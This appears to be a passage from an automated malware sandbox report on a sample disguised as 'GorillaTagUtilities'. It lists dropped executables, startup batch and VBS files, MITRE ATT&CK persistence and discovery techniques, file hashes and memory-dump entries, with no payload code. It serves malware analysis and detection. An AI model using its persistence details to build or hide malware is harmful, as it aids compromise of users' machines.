C:\Users\Admin\AppData\Roaming\Client.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4464

C:\ProgramData\$77windows32.exe
C:\ProgramData\$77windows32.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\$77windows32.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
a8e8360d573a4ff072dcc6f09d992c88

SHA1
3446774433ceaf0b400073914facab11b98b6807

SHA256
bf5e284e8f95122bf75ead61c7e2b40f55c96742b05330b5b1cb7915991df13b

SHA512
4ee5167643d82082f57c42616007ef9be57f43f9731921bdf7bca611a914724ad94072d3c8f5b130fa54129e5328ccdebf37ba74339c37deb53e79df5cdf0dbe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0026cdd9bbc34b9de2447c0eb04c14b5

SHA1
ab7713fe5fbbb23031937dd1dc7d0fa238884ad4

SHA256
cf5a1c42641a83dd41fe89923591962b7ad189006342c7a67669239688f84a2d

SHA512
62aab723672e2731946f4bbf6a3d92609ff94384e324f3c50e803095529baf848ce2cd37219a059ced4c3f559e598bd9b900b9dd8aa0657adca6d845127797fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
120c6c9af4de2accfcff2ed8c3aab1af

SHA1
504f64ae4ac9c4fe308a6a50be24fe464f3dad95

SHA256
461315e4057c3fa4d0031df3f7e6511914f082698b6c41f5c2ada831ceffb222

SHA512
041712168718dff702da8203b4089b2e57db98ce503b8ecf36809dec0cd7a595a0d427caa960bc1bd29cbedc85ad3262773f2077a476b85aca387d48f7b07ba2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96d012dd35ee43a23db987854cc9f3eb

SHA1
68fb6c90ec116b5464c1a1e7764fd17dc043bf5b

SHA256
7e35c3ce2380410d8c23b9475a5b9f0f9a9f43002638a41219e4e8023afd0ef2

SHA512
c487d1a9eb7b2290cdbfce6d81df3836d22877efc6fa6aa5357c59ae70f3b577ae7094e69bb589d207f7657c2110a65b669880922c56817c055e5addad0daee7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3b444d3f0ddea49d84cc7b3972abe0e6

SHA1
0a896b3808e68d5d72c2655621f43b0b2c65ae02

SHA256
ab075b491d20c6f66c7bd40b57538c1cfdaab5aac4715bfe3bbc7f4745860a74

SHA512
eb0ab5d68472ec42de4c9b6d84306d7bca3874be1d0ac572030a070f21a698432418068e1a6006ff88480be8c8f54c769dee74b2def403f734109dba7261f36b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ec66606831e595ea115f35d1b61b7105

SHA1
f22d025450dc8dafd9b434b2eb31cb876bcb8109

SHA256
4f17fe98ecf3ea9ec9873ff0a3acdd6ca93eb17e280a01ff6cfeca4422019dec

SHA512
f2922870f0b34b5cd8a75ce3aa94362a43997a752b0e8e9001f63d650225bf15415a75ce8aa333e4d3554a52ca5d40eec7b15ce67e3ee20441cf2680de59ed5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0fd6e5fe11c9e179bd46a19d7f0cfc35

SHA1
f55979a03af7fad7c95a0ac95c7628ee7989a7a2

SHA256
a1cefd6c38bdaf1a4d3fbba26e1b7700224dcaa29243be7acc73bc71790da4dd

SHA512
911ee14ae781429b523e41c38dcc449850d780f9ddee7b1af14ce7d5e4f59758aca702901b6df7eb415119276cac85b53ed9a04f97f665677cdd54e9cfd84949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
773440cd6eb4e778c7d2115d1f231f75

SHA1
4b600aa41fcd267817961c95b104a0717c40e558

SHA256
64c178f2a2edc319c244fa885951e0425ad172e0c9c18d9773069fa13a44385c

SHA512
af0370eb22d7153b7b71a033f56bc08796a0be9a1aa0f479585e03e099a215114f6ac059cf588999f3be36d91bc38ec64b0695071292db8e324ee7bcd505ee35

Download Submit
C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.bat

Filesize
300KB

MD5
9b737397e1ec36cdbefaabfa9ed6d7b0

SHA1
a30c4a13b435a8242a6d6e1e9d7f96ee77b38a8e

SHA256
7841dbc3907dcae8378e078183c37b315f76b5ecd3b310e7b4fe174839b97abf

SHA512
717865678e03f07a38cdb83ec8fe83f370266a9f697c596262480786252b8afcec9bf1a9ccb213c2d5d3285e94755d1bbc6cf24c2df80a11293b357861ce4239

Download Submit
C:\Users\Admin\AppData\Local\Temp\GorillaTagUtilities.exe

Filesize
47KB

MD5
d5511e6b8d49c09cd0d53065c7dab0e0

SHA1
8d9820c3c6f186cecc9798d074132085c1b9f9eb

SHA256
1b9a81a2fc7941367b1fe337c1cca18c6a45d577c212f82da3c69eae05698e49

SHA512
b5a332db858ca5cea7824534d751b8e9af386e7c5602d4b07261ca990eec0668112975479c722408a228ed32e54a1adf14b107ebf49fe9c940cedbb6ae803169

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4qllr3m.er1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_148.bat

Filesize
557KB

MD5
c88576f629b0a738df2ed3238ab890c6

SHA1
158b12ab42db9a32b2570080e2fda2f4742486df

SHA256
fd9af97638b947c8c1142bc54efa2668a8b65ccdfdbc2c08ff4d338bfa55620f

SHA512
c090ad0c9a3734419b130311e5a812300e9c3e66e7fe2cc4c2d27e257874b6854f754e563ceff68ff6497628e4dcc42d8cb31a106609ff2b8a581f0bbb7bfe5a

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_148.vbs

Filesize
115B

MD5
5bc70ffe89bcffd0d3a3cf168d689483

SHA1
3d96f668289a0b6ca11702fb95abc42db5460193

SHA256
622028bec5c7133cd83bbbdcc90f069ad0cc9643a6b88623f688c06a3cc58e8f

SHA512
9d0e66a400499b9613d7a61bb92b7abb6c39b4a613036d86d8108029a989a7be905d9a06abfd3b1121a35fd7fe7d85b5b5ee0badc16e83c3bbc3925ce430fb82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_535.vbs

Filesize
115B

MD5
1a900164753b99dc7532f6f35a928511

SHA1
26db6d99a742a132676f8b0d874911c48ee976c5

SHA256
30671d5f38cedca8c7bea2fed6cb8c4b3ec2271619d54ca16eaffe25e6cf8db4

SHA512
7a1772720125f099f0f0c61aded9bc4a7fe0c8dcb18aca2832253a362cc97c8892ea5cb33e59e57d0a65e0ee4bbbf1e0fc6026f47ed7491e14ecc377436a1f8f

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1592-132-0x00000142EB1B0000-0x00000142EB1C0000-memory.dmp

Filesize
64KB

Download
memory/1592-131-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/1592-157-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/1592-151-0x00000142EB1B0000-0x00000142EB1C0000-memory.dmp

Filesize
64KB

Download
memory/1916-212-0x0000021F3D250000-0x0000021F3D260000-memory.dmp

Filesize
64KB

Download
memory/1916-211-0x0000021F3D250000-0x0000021F3D260000-memory.dmp

Filesize
64KB

Download
memory/1916-210-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/2120-14-0x00000222AC810000-0x00000222AC890000-memory.dmp

Filesize
512KB

Download
memory/2120-12-0x00000222AA590000-0x00000222AA5A0000-memory.dmp

Filesize
64KB

Download
memory/2120-10-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/2120-11-0x00000222AA590000-0x00000222AA5A0000-memory.dmp

Filesize
64KB

Download
memory/2120-9-0x00000222AA510000-0x00000222AA532000-memory.dmp

Filesize
136KB

Download
memory/2120-41-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/2120-13-0x00000222923C0000-0x00000222923C8000-memory.dmp

Filesize
32KB

Download
memory/2304-154-0x00000000007D0000-0x00000000007E2000-memory.dmp

Filesize
72KB

Download
memory/2304-182-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/2304-155-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/3780-130-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/3780-16-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/3780-22-0x000001D272870000-0x000001D272880000-memory.dmp

Filesize
64KB

Download
memory/3780-107-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/3780-27-0x000001D272870000-0x000001D272880000-memory.dmp

Filesize
64KB

Download
memory/3780-108-0x0000023512030000-0x0000023512040000-memory.dmp

Filesize
64KB

Download
memory/3780-28-0x000001D272870000-0x000001D272880000-memory.dmp

Filesize
64KB

Download
memory/3780-29-0x000001D272870000-0x000001D272880000-memory.dmp

Filesize
64KB

Download
memory/3780-32-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/3780-125-0x0000023512030000-0x0000023512040000-memory.dmp

Filesize
64KB

Download
memory/3948-84-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/3948-85-0x0000020C440D0000-0x0000020C440E0000-memory.dmp

Filesize
64KB

Download
memory/3948-88-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/3948-86-0x0000020C440D0000-0x0000020C440E0000-memory.dmp

Filesize
64KB

Download
memory/4464-71-0x0000027C5E000000-0x0000027C5E008000-memory.dmp

Filesize
32KB

Download
memory/4464-70-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/4464-95-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/4464-72-0x0000027C5E010000-0x0000027C5E050000-memory.dmp

Filesize
256KB

Download
memory/4648-202-0x000001B073490000-0x000001B0734A0000-memory.dmp

Filesize
64KB

Download
memory/4648-206-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/4648-178-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/4716-97-0x0000020647C80000-0x0000020647C90000-memory.dmp

Filesize
64KB

Download
memory/4716-109-0x0000020647C80000-0x0000020647C90000-memory.dmp

Filesize
64KB

Download
memory/4716-83-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/4716-42-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/4716-96-0x0000020647C80000-0x0000020647C90000-memory.dmp

Filesize
64KB

Download
memory/4716-43-0x0000020647C80000-0x0000020647C90000-memory.dmp

Filesize
64KB

Download
memory/4716-54-0x0000020647C80000-0x0000020647C90000-memory.dmp

Filesize
64KB

Download
memory/4716-57-0x0000020661F40000-0x0000020661F50000-memory.dmp

Filesize
64KB

Download
memory/4744-160-0x0000028CF4B50000-0x0000028CF4B60000-memory.dmp

Filesize
64KB

Download
memory/4744-159-0x0000028CF4B50000-0x0000028CF4B60000-memory.dmp

Filesize
64KB

Download
memory/4744-158-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/4744-174-0x0000028CF4B50000-0x0000028CF4B60000-memory.dmp

Filesize
64KB

Download
memory/4744-176-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/5084-120-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/5084-179-0x0000021D388A0000-0x0000021D388B0000-memory.dmp

Filesize
64KB

Download
memory/5084-173-0x0000021D388A0000-0x0000021D388B0000-memory.dmp

Filesize
64KB

Download
memory/5084-172-0x0000021D388A0000-0x0000021D388B0000-memory.dmp

Filesize
64KB

Download
memory/5084-171-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/5084-129-0x0000021D3AD50000-0x0000021D3AD62000-memory.dmp

Filesize
72KB

Download
memory/5084-122-0x0000021D388A0000-0x0000021D388B0000-memory.dmp

Filesize
64KB

Download
memory/5084-121-0x0000021D388A0000-0x0000021D388B0000-memory.dmp

Filesize
64KB

Download
memory/5088-181-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download
memory/5088-203-0x000001CAA5D50000-0x000001CAA5D60000-memory.dmp

Filesize
64KB

Download
memory/5088-205-0x000001CAA5D50000-0x000001CAA5D60000-memory.dmp

Filesize
64KB

Download
memory/5088-180-0x000001CAA5D50000-0x000001CAA5D60000-memory.dmp

Filesize
64KB

Download
memory/5088-209-0x00007FFC3DC90000-0x00007FFC3E751000-memory.dmp

Filesize
10.8MB

Download